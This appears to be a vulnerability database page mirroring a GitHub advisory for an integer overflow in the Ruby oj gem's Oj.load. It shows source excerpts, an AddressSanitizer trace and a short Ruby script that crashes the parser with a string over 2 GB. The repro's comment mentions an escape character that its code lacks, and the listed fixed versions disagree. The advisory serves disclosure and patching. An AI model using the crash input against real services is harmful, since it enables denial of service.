GHSA-475M-PH3X-64GP

Vulnerability from github – Published: 2026-06-19 20:47 – Updated: 2026-06-19 20:47
VLAI
Summary
Oj: Integer Overflow in Oj.load 2GB String Handling
Details

Summary

Oj.load is vulnerable to heap corruption when parsing a JSON string longer than 2 GB. An integer overflow in buf_append_string (buf.h:61) converts the string length to a large negative size_t, causing memcpy to copy an astronomically large amount of data out of bounds. This crashes the process and can corrupt adjacent heap memory.

Version

  • Software: oj gem
  • Affected: all versions with ext/oj/buf.h and ext/oj/parse.c
  • Latest tested: 3.17.1 (confirmed present)

Details

ext/oj/buf.h, line 61:

inline static void buf_append_string(Buf buf, const char *s, size_t slen) {
    // ...
    memcpy(buf->tail, s, slen);   // slen derived from 32-bit int that wrapped negative

In parse.c, escape sequence handling computes the remaining string length as an int:

// parse.c:402 (read_escaped_str)
int  slen = (int)(s - str);   // ← wraps to negative when string > 2 GB
buf_append_string(buf, str, (size_t)slen);  // ← (size_t)(-2147483648) = 0x80000000...

ASAN report:

==399019==ERROR: AddressSanitizer: negative-size-param: (size=-2147483648)
    #0 __asan_memcpy
    #1 buf_append_string  /ext/oj/buf.h:61
    #2 read_escaped_str   /ext/oj/parse.c:402
    #3 read_str           /ext/oj/parse.c:542
    #4 oj_parse2          /ext/oj/parse.c:882
    #5 oj_pi_parse        /ext/oj/parse.c:1256
    #6 oj_object_parse    /ext/oj/object.c:701
    #7 load               /ext/oj/oj.c:1259
0x7f5a26ff0801 is located 1 bytes inside of 2147483657-byte region [0x7f5a26ff0800, 0x7f5aa6ff0809)

Reproduce

require 'oj'
n = 1 << 31                         # 2 GB
json = '"' + ('A' * n) + 'A"'  # >2GB JSON string with a trailing escape
Oj.load(json)
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 3.17.2"
      },
      "package": {
        "ecosystem": "RubyGems",
        "name": "oj"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.17.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54903"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-190"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T20:47:31Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`Oj.load` is vulnerable to heap corruption when parsing a JSON string longer than 2 GB. An integer overflow in `buf_append_string` (`buf.h:61`) converts the string length to a large negative `size_t`, causing `memcpy` to copy an astronomically large amount of data out of bounds. This crashes the process and can corrupt adjacent heap memory.\n\n### Version\n\n- **Software**: oj gem\n- **Affected**: all versions with `ext/oj/buf.h` and `ext/oj/parse.c`\n- **Latest tested**: 3.17.1 (confirmed present)\n\n### Details\n\n`ext/oj/buf.h`, line 61:\n\n```c\ninline static void buf_append_string(Buf buf, const char *s, size_t slen) {\n    // ...\n    memcpy(buf-\u003etail, s, slen);   // slen derived from 32-bit int that wrapped negative\n```\n\nIn `parse.c`, escape sequence handling computes the remaining string length as an `int`:\n\n```c\n// parse.c:402 (read_escaped_str)\nint  slen = (int)(s - str);   // \u2190 wraps to negative when string \u003e 2 GB\nbuf_append_string(buf, str, (size_t)slen);  // \u2190 (size_t)(-2147483648) = 0x80000000...\n```\n\nASAN report:\n```\n==399019==ERROR: AddressSanitizer: negative-size-param: (size=-2147483648)\n    #0 __asan_memcpy\n    #1 buf_append_string  /ext/oj/buf.h:61\n    #2 read_escaped_str   /ext/oj/parse.c:402\n    #3 read_str           /ext/oj/parse.c:542\n    #4 oj_parse2          /ext/oj/parse.c:882\n    #5 oj_pi_parse        /ext/oj/parse.c:1256\n    #6 oj_object_parse    /ext/oj/object.c:701\n    #7 load               /ext/oj/oj.c:1259\n0x7f5a26ff0801 is located 1 bytes inside of 2147483657-byte region [0x7f5a26ff0800, 0x7f5aa6ff0809)\n```\n\n### Reproduce\n\n```ruby\nrequire \u0027oj\u0027\nn = 1 \u003c\u003c 31                         # 2 GB\njson = \u0027\"\u0027 + (\u0027A\u0027 * n) + \u0027A\"\u0027  # \u003e2GB JSON string with a trailing escape\nOj.load(json)\n```",
  "id": "GHSA-475m-ph3x-64gp",
  "modified": "2026-06-19T20:47:31Z",
  "published": "2026-06-19T20:47:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ohler55/oj/security/advisories/GHSA-475m-ph3x-64gp"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ohler55/oj"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Oj: Integer Overflow in Oj.load 2GB String Handling"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…